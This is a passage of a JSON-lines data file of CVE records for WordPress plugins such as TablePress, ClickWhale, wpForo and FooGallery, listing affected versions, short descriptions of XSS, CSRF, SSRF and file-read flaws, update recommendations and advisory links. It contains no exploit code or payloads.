csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9595","slug":"tablepress","versionImpact":"2.4.2","versionEndExcluding":"2.4.3","description":"The TablePress \u2013 Tables in WordPress made easy plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the table cell content in all versions up to, and including, 2.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ffa3b85c-7d08-4f6a-889e-b75620f72a1a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ffa3b85c-7d08-4f6a-889e-b75620f72a1a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3165531%40tablepress%2Ftrunk&old=3149006%40tablepress%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3165531%40tablepress%2Ftrunk&old=3149006%40tablepress%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9653","slug":"menu-ordering-reservations","versionImpact":"2.4.2","versionEndExcluding":"2.4.3","description":"The Restaurant Menu \u2013 Food Ordering System \u2013 Table Reservation plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'action' parameter in all versions up to, and including, 2.4.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/11ccafd9-dad5-4b7d-b913-7821dd52d12b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/11ccafd9-dad5-4b7d-b913-7821dd52d12b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3186456%40menu-ordering-reservations&new=3186456%40menu-ordering-reservations&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3186456%40menu-ordering-reservations&new=3186456%40menu-ordering-reservations&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4262","slug":"piotnet-addons-for-elementor","versionImpact":"2.4.28","versionEndExcluding":"2.4.29","description":"The Piotnet Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple widgets in all versions up to, and including, 2.4.28 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.4.29, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/812cc8f1-f89e-47c4-b029-f6a3dbc55d70?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/812cc8f1-f89e-47c4-b029-f6a3dbc55d70?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3088562%40piotnet-addons-for-elementor&old=3048934%40piotnet-addons-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3088562%40piotnet-addons-for-elementor&old=3048934%40piotnet-addons-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4432","slug":"piotnet-addons-for-elementor","versionImpact":"2.4.26","versionEndExcluding":"2.4.28","description":"The Piotnet Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widgets in all versions up to, and including, 2.4.26 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.4.28, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4f65a7df-acb5-4b5b-8867-986ce9930e3f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4f65a7df-acb5-4b5b-8867-986ce9930e3f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/piotnet-addons-for-elementor\\\/trunk\\\/widgets\\\/pafe-before-after-image-comparison-slider.php#L195\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/piotnet-addons-for-elementor\\\/trunk\\\/widgets\\\/pafe-before-after-image-comparison-slider.php#L195\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/piotnet-addons-for-elementor\\\/trunk\\\/widgets\\\/pafe-table.php#L195\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/piotnet-addons-for-elementor\\\/trunk\\\/widgets\\\/pafe-table.php#L195\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3087322\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3087322\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3996","slug":"post-carousel","versionImpact":"2.4.27","versionEndExcluding":"2.4.28","description":"The Smart Post Show  WordPress plugin before 2.4.28 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 2.4.28, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4035e3f9-89fe-49e1-8aa2-55ab3f1aa528\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4035e3f9-89fe-49e1-8aa2-55ab3f1aa528\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6947","slug":"foogallery-premium","versionImpact":"2.4.26","versionEndExcluding":"2.4.27","description":"The Best WordPress Gallery Plugin \u2013 FooGallery plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 2.4.26. This makes it possible for authenticated attackers, with contributor level or higher to read the contents of arbitrary folders on the server, which can contain sensitive information such as folder structure.","recommendation":"Update to version 2.4.27, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/fooplugins\\\/foogallery\\\/pull\\\/263\\\/commits\\\/9989f6f4f4d478ec04cb634d09b18c87a5b31c4d\",\"name\":\"https:\\\/\\\/github.com\\\/fooplugins\\\/foogallery\\\/pull\\\/263\\\/commits\\\/9989f6f4f4d478ec04cb634d09b18c87a5b31c4d\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68420c5a-4add-4597-bd2a-20dc831e81bd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68420c5a-4add-4597-bd2a-20dc831e81bd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0808","slug":"houzez-property-feed","versionImpact":"2.4.21","versionEndExcluding":"2.4.22","description":"The Houzez Property Feed plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.4.21. This is due to missing or incorrect nonce validation on the \"deleteexport\" action. This makes it possible for unauthenticated attackers to delete property feed exports via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.4.22, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3235031\\\/houzez-property-feed\\\/trunk\\\/includes\\\/class-houzez-property-feed-export.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3235031\\\/houzez-property-feed\\\/trunk\\\/includes\\\/class-houzez-property-feed-export.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6fd866ac-6094-4f76-9fba-69494381214c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6fd866ac-6094-4f76-9fba-69494381214c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13513","slug":"oliver-pos","versionImpact":"2.4.2.3","versionEndExcluding":"2.4.2.4","description":"The Oliver POS \u2013 A WooCommerce Point of Sale (POS) plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.4.2.3 via the logging functionality. This makes it possible for unauthenticated attackers to extract sensitive data including the plugin's clientToken, which in turn can be used to change user account information including emails and account type. This allows attackers to then change account passwords resulting in a complete site takeover. Version 2.4.2.3 disabled logging but left sites with existing log files vulnerable.","recommendation":"Update to version 2.4.2.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/oliver-pos\\\/trunk\\\/includes\\\/models\\\/class-pos-bridge-user.php#L373\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/oliver-pos\\\/trunk\\\/includes\\\/models\\\/class-pos-bridge-user.php#L373\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3234731%40oliver-pos%2Ftrunk&old=3056051%40oliver-pos%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3234731%40oliver-pos%2Ftrunk&old=3056051%40oliver-pos%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bf6b7d8d-fb13-4eb4-b0b4-d0a10ad2a21e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bf6b7d8d-fb13-4eb4-b0b4-d0a10ad2a21e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0804","slug":"clickwhale","versionImpact":"2.4.1","versionEndExcluding":"2.4.2","description":"The ClickWhale \u2013 Link Manager, Link Shortener and Click Tracker for Affiliate Links & Link Pages plugin for WordPress is vulnerable to Stored Cross-Site Scripting via link titles in all versions up to, and including, 2.4.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3219341\\\/clickwhale\\\/tags\\\/2.4.2\\\/includes\\\/admin\\\/links\\\/Clickwhale_Links_List_Table.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3219341\\\/clickwhale\\\/tags\\\/2.4.2\\\/includes\\\/admin\\\/links\\\/Clickwhale_Links_List_Table.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bf41b5e1-610e-4159-9325-f7a694380050?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bf41b5e1-610e-4159-9325-f7a694380050?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11327","slug":"clickwhale","versionImpact":"2.4.1","versionEndExcluding":"2.4.2","description":"The ClickWhale \u2013 Link Manager, Link Shortener and Click Tracker for Affiliate Links & Link Pages plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.4.1. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clickwhale\\\/tags\\\/2.3.0\\\/includes\\\/admin\\\/links\\\/Clickwhale_Links_List_Table.php#L384\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clickwhale\\\/tags\\\/2.3.0\\\/includes\\\/admin\\\/links\\\/Clickwhale_Links_List_Table.php#L384\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3219341%40clickwhale&new=3219341%40clickwhale&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3219341%40clickwhale&new=3219341%40clickwhale&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96c5836f-6d33-4a56-b30b-5e5d95b81b6b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96c5836f-6d33-4a56-b30b-5e5d95b81b6b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0764","slug":"wpforo","versionImpact":"2.4.1","versionEndExcluding":"2.4.2","description":"The wpForo Forum plugin for WordPress is vulnerable to arbitrary file read due to insufficient input validation in the 'update' method of the 'Members' class in all versions up to, and including, 2.4.1. This makes it possible for authenticated attackers, with subscriber-level privileges or higher, to read arbitrary files on the server.","recommendation":"Update to version 2.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3245711\\\/wpforo\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3245711\\\/wpforo\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8cd8ffcb-0a24-4e0a-a9f9-23501742715f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8cd8ffcb-0a24-4e0a-a9f9-23501742715f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-35770","slug":"vimeography","versionImpact":"2.4.1","versionEndExcluding":"2.4.2","description":"Cross-Site Request Forgery (CSRF) vulnerability in Dave Kiss Vimeography: Vimeo Video Gallery WordPress Plugin.This issue affects Vimeography: Vimeo Video Gallery WordPress Plugin: from n\/a through 2.4.1.","recommendation":"Update to version 2.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/vimeography\\\/wordpress-vimeography-plugin-2-4-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/vimeography\\\/wordpress-vimeography-plugin-2-4-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10903","slug":"broken-link-checker","versionImpact":"2.4.1","versionEndExcluding":"2.4.2","description":"The Broken Link Checker WordPress plugin before 2.4.2 does not validate a the link URLs before making a request to them, which could allow admin users to perform SSRF attack, for example on a multisite installation.","recommendation":"Update to version 2.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/39027390-ce01-4dd5-a979-426785aa7acb\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/39027390-ce01-4dd5-a979-426785aa7acb\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13662","slug":"ehive-objects-image-grid","versionImpact":"2.4.1","versionEndExcluding":"2.4.2","description":"The eHive Objects Image Grid plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ehive_objects_image_grid' shortcode in all versions up to, and including, 2.4.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ehive-objects-image-grid\\\/trunk\\\/templates\\\/eHiveObjectsImageGrid.php#L22\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ehive-objects-image-grid\\\/trunk\\\/templates\\\/eHiveObjectsImageGrid.php#L22\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3230975%40ehive-objects-image-grid&new=3230975%40ehive-objects-image-grid&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3230975%40ehive-objects-image-grid&new=3230975%40ehive-objects-image-grid&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/638d8ef6-dab0-4cfa-8ecc-af2ded3c6d79?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/638d8ef6-dab0-4cfa-8ecc-af2ded3c6d79?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10582","slug":"music-player-for-elementor","versionImpact":"2.4.1","versionEndExcluding":"2.4.2","description":"The Music Player for Elementor \u2013 Audio Player & Podcast Player plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the import_mpfe_template() function in all versions up to, and including, 2.4.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to import templates.","recommendation":"Update to version 2.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f66cdcf-cbe5-43e0-ad18-c2b9c4491ed4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f66cdcf-cbe5-43e0-ad18-c2b9c4491ed4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3186359%40music-player-for-elementor%2Ftrunk&old=3174807%40music-player-for-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3186359%40music-player-for-elementor%2Ftrunk&old=3174807%40music-player-for-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9769","slug":"gallery-videos","versionImpact":"2.4.1","versionEndExcluding":"2.4.2","description":"The Video Gallery \u2013 Best WordPress YouTube Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.4.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 2.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/179304\\\/WordPress-Gallery-2.3.6-Cross-Site-Scripting.html\",\"name\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/179304\\\/WordPress-Gallery-2.3.6-Cross-Site-Scripting.html\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b57c9e58-64a6-48e8-8ef6-25608e4131e6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b57c9e58-64a6-48e8-8ef6-25608e4131e6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4353","slug":"wc-dynamic-pricing-and-discounts","versionEndExcluding":"2.4.2","description":"The WooCommerce Dynamic Pricing and Discounts plugin for WordPress is vulnerable to unauthenticated settings export in versions up to, and including, 2.4.1. This is due to missing authorization on the export() function which makes makes it possible for unauthenticated attackers to export the plugin's settings.","recommendation":"Update to version 2.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5c1e6685-44a7-452e-89ab-b9fffb65a12b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5c1e6685-44a7-452e-89ab-b9fffb65a12b?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/woocommerce-dynamic-pricing-and-discounts-plugin-fixed-multiple-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/woocommerce-dynamic-pricing-and-discounts-plugin-fixed-multiple-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0097","slug":"post-carousel","versionEndExcluding":"2.4.19","description":"The Post Grid, Post Carousel, & List Category Posts WordPress plugin before 2.4.19 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/19379f08-d667-4b1e-a774-0f4a17ad7bff\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/19379f08-d667-4b1e-a774-0f4a17ad7bff\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11805","slug":"quick-license-manager","versionImpact":"2.4.17","versionEndExcluding":"2.4.18","description":"The Quick License Manager \u2013 WooCommerce Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'submit_qlm_products' parameter in all versions up to, and including, 2.4.17 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.4.18, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3198437\\\/quick-license-manager\\\/trunk?contextall=1&old=3198391&old_path=%2Fquick-license-manager%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3198437\\\/quick-license-manager\\\/trunk?contextall=1&old=3198391&old_path=%2Fquick-license-manager%2Ftrunk\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c781c8a-1ffb-438b-bf78-9d386fbd16eb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c781c8a-1ffb-438b-bf78-9d386fbd16eb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5459","slug":"food-and-drink-menu","versionImpact":"2.4.16","versionEndExcluding":"2.4.17","description":"The Restaurant Menu and Food Ordering plugin for WordPress is vulnerable to unauthorized creation of data due to a missing capability check on 'add_section', 'add_menu', 'add_menu_item', and 'add_menu_page' functions in all versions up to, and including, 2.4.16. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create menu sections, menus, food items, and new menu pages.","recommendation":"Update to version 2.4.17, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/03f9d9bb-6a87-4da9-bbb0-65203d7250e9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/03f9d9bb-6a87-4da9-bbb0-65203d7250e9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/food-and-drink-menu\\\/trunk\\\/includes\\\/class-installation-walkthrough.php#L62\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/food-and-drink-menu\\\/trunk\\\/includes\\\/class-installation-walkthrough.php#L62\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/food-and-drink-menu\\\/trunk\\\/includes\\\/class-installation-walkthrough.php#L80\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/food-and-drink-menu\\\/trunk\\\/includes\\\/class-installation-walkthrough.php#L80\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/food-and-drink-menu\\\/trunk\\\/includes\\\/class-installation-walkthrough.php#L111\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/food-and-drink-menu\\\/trunk\\\/includes\\\/class-installation-walkthrough.php#L111\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/food-and-drink-menu\\\/trunk\\\/includes\\\/class-installation-walkthrough.php#L144\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/food-and-drink-menu\\\/trunk\\\/includes\\\/class-installation-walkthrough.php#L144\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097599\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097599\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2122","slug":"foogallery","versionImpact":"2.4.15","versionEndExcluding":"2.4.16","description":"The Best WordPress Gallery Plugin \u2013 FooGallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via album gallery custom URLs in all versions up to, and including, 2.4.15 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.4.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a69e9802-9087-4cd9-86eb-b64a82bc7c0b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a69e9802-9087-4cd9-86eb-b64a82bc7c0b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3100157%40foogallery&new=3100157%40foogallery&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3100157%40foogallery&new=3100157%40foogallery&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
